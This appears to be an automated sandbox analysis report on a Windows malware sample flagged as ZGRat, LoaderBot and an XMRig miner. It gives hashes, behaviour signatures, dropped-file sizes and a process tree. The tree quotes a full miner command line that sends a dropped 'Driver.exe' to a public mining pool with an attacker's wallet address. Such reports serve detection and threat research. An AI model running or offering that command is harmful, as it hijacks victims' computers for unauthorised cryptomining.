Analysis
-
max time kernel
97s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20231020-en -
resource tags
-
submitted
02-11-2023 04:52
General
-
Target
93c9a22d4c887be2f5558aa1fc8a809ef03549cc6a3241ee8fccae1f199ac0e5.exe
-
Size
4.1MB
-
MD5
ca4b4a453bd6ce61fb70cc8ec70aad4b
-
SHA1
7c13390a6a6f8fd3232b7f4348fc631c32713301
-
SHA256
93c9a22d4c887be2f5558aa1fc8a809ef03549cc6a3241ee8fccae1f199ac0e5
-
SHA512
35d83f0a1defce25b71a24fed773905a84d9c479fb749e049ddf532c3a3b637de1ba7cd39fb01fa8a732aced416ec3ad80f494629e515e3f7acbb493bd3d3675
-
SSDEEP
49152:bBtjBhz6OfiQc66RTsS01TEhZ1ApkmBJEzOwcsOfkCVVIEhSuDG0fdmO:FhzjfhlbTEhLYECwcZs+VhhS6fcO
Malware Config
Signatures
-
Detect ZGRat V1 1 IoCs
-
Detects DLL dropped by Raspberry Robin. 5 IoCs
Raspberry Robin.
-
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
-
ZGRat
ZGRat is remote access trojan written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
LoaderBot executable 1 IoCs
-
XMRig Miner payload 27 IoCs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 1 IoCs
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 14 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\93c9a22d4c887be2f5558aa1fc8a809ef03549cc6a3241ee8fccae1f199ac0e5.exe"C:\Users\Admin\AppData\Local\Temp\93c9a22d4c887be2f5558aa1fc8a809ef03549cc6a3241ee8fccae1f199ac0e5.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\fuhksvwrcbddad.exe"C:\Users\Admin\AppData\Local\Temp\fuhksvwrcbddad.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 42K92y1uNN7PxEp57QZPiLQogD8pGGRjWQnqEemCTsXMSnqrhagsVujaeBc38hqrX88YL8Wh9pNQHRzTN7GBw8SqQkGBwg7 -p x -k -v=0 --donate-level=1 -t 44⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.4MB
MD5fcae6470428b538abaed4b90123bacda
SHA197286c0292a000e6d29dd519c986d21fb740310f
SHA2567ba39c5a74884e46e0d746f74858622917153f1686a079ba0992b00468c844ad
SHA512ae9bec21dd44da2cc42935eb257a6f111a091f9c469bd1bfa6682235b9350bfa5531c1fefabc921f2abed7f3e4d5616def0a7ddad8b77bf64361e6b3c32eedab
-
Filesize
4.4MB
MD5fcae6470428b538abaed4b90123bacda
SHA197286c0292a000e6d29dd519c986d21fb740310f
SHA2567ba39c5a74884e46e0d746f74858622917153f1686a079ba0992b00468c844ad
SHA512ae9bec21dd44da2cc42935eb257a6f111a091f9c469bd1bfa6682235b9350bfa5531c1fefabc921f2abed7f3e4d5616def0a7ddad8b77bf64361e6b3c32eedab
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
742KB
MD5544cd51a596619b78e9b54b70088307d
SHA14769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
128KB
-
Filesize
11.5MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
128KB
-
Filesize
80KB
-
Filesize
11.5MB
-
Filesize
11.5MB
-
Filesize
536KB
-
Filesize
536KB
-
Filesize
536KB
-
Filesize
536KB
-
Filesize
536KB
-
Filesize
536KB
-
Filesize
64KB
-
Filesize
1.6MB
-
Filesize
4.1MB
-
Filesize
5.0MB
-
Filesize
584KB
-
Filesize
624KB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
104KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
1024KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
832KB
-
Filesize
832KB
-
Filesize
832KB
-
Filesize
10.6MB
-
Filesize
1.8MB
-
Filesize
10.6MB
-
Filesize
408KB
-
Filesize
1.8MB
-
Filesize
832KB
-
Filesize
832KB
-
Filesize
832KB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
10.6MB
-
Filesize
1.8MB